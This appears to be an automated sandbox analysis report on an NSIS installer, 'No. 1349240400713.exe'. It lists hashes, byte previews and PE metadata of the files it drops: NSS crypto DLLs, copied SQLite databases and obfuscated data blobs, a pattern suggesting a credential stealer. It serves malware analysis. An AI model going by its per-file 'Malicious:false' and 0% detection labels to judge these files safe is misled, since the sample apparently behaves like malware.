                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1244112
                                                              Entropy (8bit):6.809431682312062
                                                              Encrypted:false
                                                              SSDEEP:24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
                                                              MD5:556EA09421A0F74D31C4C0A89A70DC23
                                                              SHA1:F739BA9B548EE64B13EB434A3130406D23F836E3
                                                              SHA-256:F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
                                                              SHA-512:2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b*..c+lh.+..c++.`*..c++.f*..c++.g*..c+.b*..c+9.b*..c+..b+..c+9.k*..c+9.g*C.c+9.c*..c+9..+..c+9.a*..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):92624
                                                              Entropy (8bit):6.639368309935547
                                                              Encrypted:false
                                                              SSDEEP:1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
                                                              MD5:569A7A65658A46F9412BDFA04F86E2B2
                                                              SHA1:44CC0038E891AE73C43B61A71A46C97F98B1030D
                                                              SHA-256:541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
                                                              SHA-512:C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):144336
                                                              Entropy (8bit):6.5527585854849395
                                                              Encrypted:false
                                                              SSDEEP:3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
                                                              MD5:67827DB2380B5848166A411BAE9F0632
                                                              SHA1:F68F1096C5A3F7B90824AA0F7B9DA372228363FF
                                                              SHA-256:9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
                                                              SHA-512:910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1142072
                                                              Entropy (8bit):6.809041027525523
                                                              Encrypted:false
                                                              SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                              MD5:D6326267AE77655F312D2287903DB4D3
                                                              SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                              SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                              SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):83784
                                                              Entropy (8bit):6.890347360270656
                                                              Encrypted:false
                                                              SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                              MD5:7587BF9CB4147022CD5681B015183046
                                                              SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                              SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                              SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\40130934118174378141.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\40131567037731335628617.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):98304
                                                              Entropy (8bit):0.08235737944063153
                                                              Encrypted:false
                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\40131567037731335628617.tmp-shm

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.017262956703125623
                                                              Encrypted:false
                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                              Malicious:false
                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\4013171757613254813372.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.137181696973627
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                              MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                              SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                              SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                              SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\401320312729709407589.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.137181696973627
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                              MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                              SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                              SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                              SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\4013250255868327602303.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                              Category:modified
                                                              Size (bytes):159744
                                                              Entropy (8bit):0.5394293526345721
                                                              Encrypted:false
                                                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\nsy4AC1.tmp\System.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:modified
                                                              Size (bytes):12288
                                                              Entropy (8bit):5.737874809466366
                                                              Encrypted:false
                                                              SSDEEP:192:nenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBDIwL:n8+Qlt70Fj/lQRY/9VjjfL
                                                              MD5:564BB0373067E1785CBA7E4C24AAB4BF
                                                              SHA1:7C9416A01D821B10B2EEF97B80899D24014D6FC1
                                                              SHA-256:7A9DDEE34562CD3703F1502B5C70E99CD5BBA15DE2B6845A3555033D7F6CB2A5
                                                              SHA-512:22C61A323CB9293D7EC5C7E7E60674D0E2F7B29D55BE25EB3C128EA2CD7440A1400CEE17C43896B996278007C0D247F331A9B8964E3A40A0EB1404A9596C4472
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....$_...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\udstrmningsdysernes\eir\Speckly\Intuitionernes.bnd

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):229793
                                                              Entropy (8bit):1.4642031564062232
                                                              Encrypted:false
                                                              SSDEEP:768:C+HPGJfVhPDQHMt0DQ1oeTUifi7iY+kU2CcSlnM62d9u1M2cys0UZgJ2T7KgZfxu:Efr35cs2HMrJnaKxBt+aEROhXv
                                                              MD5:756B6EF5A3A2F1325C8C405839AE2038
                                                              SHA1:1CB4E016E36E79CC086C7E329C1890715EB646FE
                                                              SHA-256:2C18506F37F06DAD09462BF79F818FDC4765A96127DB132F703E1E02C0D79592
                                                              SHA-512:87300A4D16EAB9AD221F24813EFDD05381BB157B6EEFDD1933CA94CBE1B6629005FCFE730F6BD92F3752D08BA2E1799E9D5D41CA220750707BCAA5FB1F228CB4
                                                              Malicious:false
                                                              Preview:.Q<.......`..............X........5...|.i...................................................G.........]..............a.............................................d................................3.....................................t............................&..w.................................................................../...............V............v........u............p..........................................6......?(..{......................1_.!............M.k......?.....................[.........................................................w.......................................................W.....J............+....................v.......?.................$...................o...................................................................b...............g...........b............................&.................................k.................N....................$.....................U...................................................................k

                                                              C:\Users\user\udstrmningsdysernes\eir\Speckly\Undefectiveness.pro

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):171443
                                                              Entropy (8bit):1.467810786620408
                                                              Encrypted:false
                                                              SSDEEP:768:+T/eEYQyXFjCARfNh1z15a7qOvlkh351RvrhT9FMhTEM/9jXv8qB9N2sRm1T/6W2:RAoFmSZV0Vj7QUJ
                                                              MD5:4D31FDE37F1657C182DDFF79B4E2B5A5
                                                              SHA1:EE293492272CEE9058214B108DC218F022FEE640
                                                              SHA-256:8197FC9064BC99075F05C0A176C449EAA87D3A284A2304369085BB332530FA15
                                                              SHA-512:CA06B5CCE74F433D5BD118EE19E9744DBE409548232155825844684BB5292B7C4B5FCFA54FD10AEB91E09F75A253547BD3B0148814DF0250B0D43470D28CBFFB
                                                              Malicious:false
                                                              Preview:....d..........L...j.....O.......8.............................c...........................................q............................................................S............................................................;...............!..u....X..................i......0...?.................H..........s......................................Q..........................................^....Um........................................................I.......d...&......................!..L..................F.............U................(...............................................................[...............................................................................................t..........d...=.....#...J.................................................................................a................................................f..........~.....................................?............"............T.................s...............................?.............

                                                              C:\Users\user\udstrmningsdysernes\eir\Speckly\Wartlike228.Bln

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):470445
                                                              Entropy (8bit):6.97469227476125
                                                              Encrypted:false
                                                              SSDEEP:6144:w7AoUTSDxZMJa/uuCFj6mJ+KgFZUeGztNtXw1aBEuUxoVf7abS86pSH:wUoLdqo/u5UJvHezYaBDUcja+1K
                                                              MD5:305EA21A8615D27FDC4C025370BA5773
                                                              SHA1:9CA2CFEF430DA6107BDDBCB66D4B9F8DA8ED93EA
                                                              SHA-256:7280A6ACB799CE6619F615FE7B76363E5FF889794589426DB97B8A5F50F67E75
                                                              SHA-512:A07F9E4B273FBD317BE1EC5AF7406D40CB9C859C955A4997BDE31E96F68FE170DFE834F8F887ADAA046338974788C05816361C3B88117721E6B7CB22A0A8B5DF
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\udstrmningsdysernes\eir\Speckly\hocuses.cur

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):121525
                                                              Entropy (8bit):1.4739029245635806
                                                              Encrypted:false
                                                              SSDEEP:768:YZwdEH/XamBWv0E5OO5FVi+7ACsFm49yq4s0Xt2xFBM6tooBUi6uko:t+va6bEb/3bYZF6q
                                                              MD5:50B41E3EEF8B5D219355CACC44D31161
                                                              SHA1:91ADD8F503E9EFE734623542BC1AEB2091A40A95
                                                              SHA-256:E58C68FE961C8E03A5F463A13720A4CA168A7EF1AD8EA8182392A9811C277D5E
                                                              SHA-512:C0C2BA04ADBD5F986F42A29B1B3C9A0B436E12690DB64B30850384A21ACAFB4EAACBD8F060AAC46EBA315D330BBCD4910C3ACBBD3AFD586DC2AAD0D74DC5EA55
                                                              Malicious:false
                                                              Preview:..........b....../.........................U............................]......................t...................K.................N.................J.............5........C..............................k.............1..............E......+`....................................J....................Y..........................................+.........]....U................C.............../......................d...8.........................................6...................................................................A......2..........................................................................r......................-.............z....V.(..............m...;..................e..........P....................................@.............................................................................................n.......(..r.....>......K..X~.................._.?..............................&.............w..........l......"...........................7.........................

                                                              C:\Users\user\udstrmningsdysernes\eir\Speckly\zeolitter.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:ASCII text, with very long lines (312), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):312
                                                              Entropy (8bit):4.293553387460343
                                                              Encrypted:false
                                                              SSDEEP:6:wxqZuEqXE6v8wJ6ARsI+SiCRyxijdLcE9PV7ONxobNFPCABVRRQBHYj/:wcZuEqXZJbT+0yx2pVUqCORRQBHYj/
                                                              MD5:7E339110B2D68CE5ED88614C32B7A56E
                                                              SHA1:6D5BF14FC1EF712E8ED8A2823D1D4F584EEC1650
                                                              SHA-256:F8AB0068D1B157ECFB10CCB62DA4318ACE81DAA48B76DB17D28315CFFEA44BF6
                                                              SHA-512:B878B668CA55AD01B693B6D131C265F893FFB3D38F127693D951F1A9E7E516CBCDE05495287E97C1F2176F8F9F802B2D3D9B98E9E3D617053DF8D8B22875F622
                                                              Malicious:false
                                                              Preview:bredestitch adamastor thaumaturgist fodermesters rigsdansken curstfully,albrecht mjen jamoke spectralism jarrad sindssygdomme.outquibling englnder unjuicy.sklent takometres vitalistically unsurlily ologist tudsefisken strettos,paahitsom alands thiasite millilambert.matthies aktieforbindelser dullhead squinancy.

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Entropy (8bit):7.489669573761037
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:No. 1349240400713.exe
                                                              File size:670'091 bytes
                                                              MD5:0049a8ce1e4c42cea9b5d2516c64612c
                                                              SHA1:f0526a23f7f5de1c0b2200e92fba833edcacbe02
                                                              SHA256:d0549673b20a4041c1d1bfbdd841b0b768fefa6057f6a4203d54d0694f270cff
                                                              SHA512:b0b3af0312dffad1492c768475713f15f21b7832c0a5e4e64107149ef9b4f950ca56092d0013343869a649f3c0d009a6f24ae628bbc178569911b5ea0e506315
                                                              SSDEEP:6144:cT4DtLOuR2uyPG+H+tMN+dOugpzlyUflyWCalNEToCp6lAG9urP2DDUK5Lq75k:cT02VG+4iDlyUoaiXp6X9uruAK5Gi
                                                              TLSH:68E401C1F91881AEDC7386B9D4719AFA179F9C3B8240266B37C0778E5C712A141FBAC5
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...@.$_.................h.........

                                                              File Icon

                                                              Icon Hash:8e13714c04651306

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4034c5
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x5F24D740 [Sat Aug 1 02:45:20 2020 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:6e7f9a29f2c85394521a08b9f31f6275

                                                              Entrypoint Preview

                                                              Instruction
                                                              sub esp, 000002D4h
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              push 00000020h
                                                              pop edi
                                                              xor ebx, ebx
                                                              push 00008001h
                                                              mov dword ptr [esp+14h], ebx
                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                              mov dword ptr [esp+1Ch], ebx
                                                              call dword ptr [004080CCh]
                                                              call dword ptr [004080D0h]
                                                              and eax, BFFFFFFFh
                                                              cmp ax, 00000006h
                                                              mov dword ptr [00434F0Ch], eax
                                                              je 00007F5860E465B3h
                                                              push ebx
                                                              call 00007F5860E498A1h
                                                              cmp eax, ebx
                                                              je 00007F5860E465A9h
                                                              push 00000C00h
                                                              call eax
                                                              mov esi, 004082B0h
                                                              push esi
                                                              call 00007F5860E4981Bh
                                                              push esi
                                                              call dword ptr [00408154h]
                                                              lea esi, dword ptr [esi+eax+01h]
                                                              cmp byte ptr [esi], 00000000h
                                                              jne 00007F5860E4658Ch
                                                              push 0000000Bh
                                                              call 00007F5860E49874h
                                                              push 00000009h
                                                              call 00007F5860E4986Dh
                                                              push 00000007h
                                                              mov dword ptr [00434F04h], eax
                                                              call 00007F5860E49861h
                                                              cmp eax, ebx
                                                              je 00007F5860E465B1h
                                                              push 0000001Eh
                                                              call eax
                                                              test eax, eax
                                                              je 00007F5860E465A9h
                                                              or byte ptr [00434F0Fh], 00000040h
                                                              push ebp
                                                              call dword ptr [00408038h]
                                                              push ebx
                                                              call dword ptr [00408298h]
                                                              mov dword ptr [00434FD8h], eax
                                                              push ebx
                                                              lea eax, dword ptr [esp+34h]
                                                              push 000002B4h
                                                              push eax
                                                              push ebx
                                                              push 0042B228h
                                                              call dword ptr [0040818Ch]
                                                              push 0040A2C8h

                                                              Rich Headers

                                                              Programming Language:
                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7f0000x289e8.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x67930x6800c25464d6f87775ef687d2492f92ddf9aFalse0.6720628004807693data6.495258513279076IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x80000x14a40x1600e36c6ad0568cd039e0c7810069438d6dFalse0.4385653409090909data5.01371465125838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xa0000x2b0180x60033b1d611a00420c98fa82231feaa907bFalse0.5240885416666666data4.155579717739458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .ndata0x360000x490000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x7f0000x289e80x28a00a4a68548dea512ae9cd3ee42d0de6767False0.34076923076923077data4.845257821547735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_BITMAP0x7f4000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                              RT_ICON0x7f7680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.28531290666035725
                                                              RT_ICON0x8ff900x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.36112570948076517
                                                              RT_ICON0x994380x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.3842421441774492
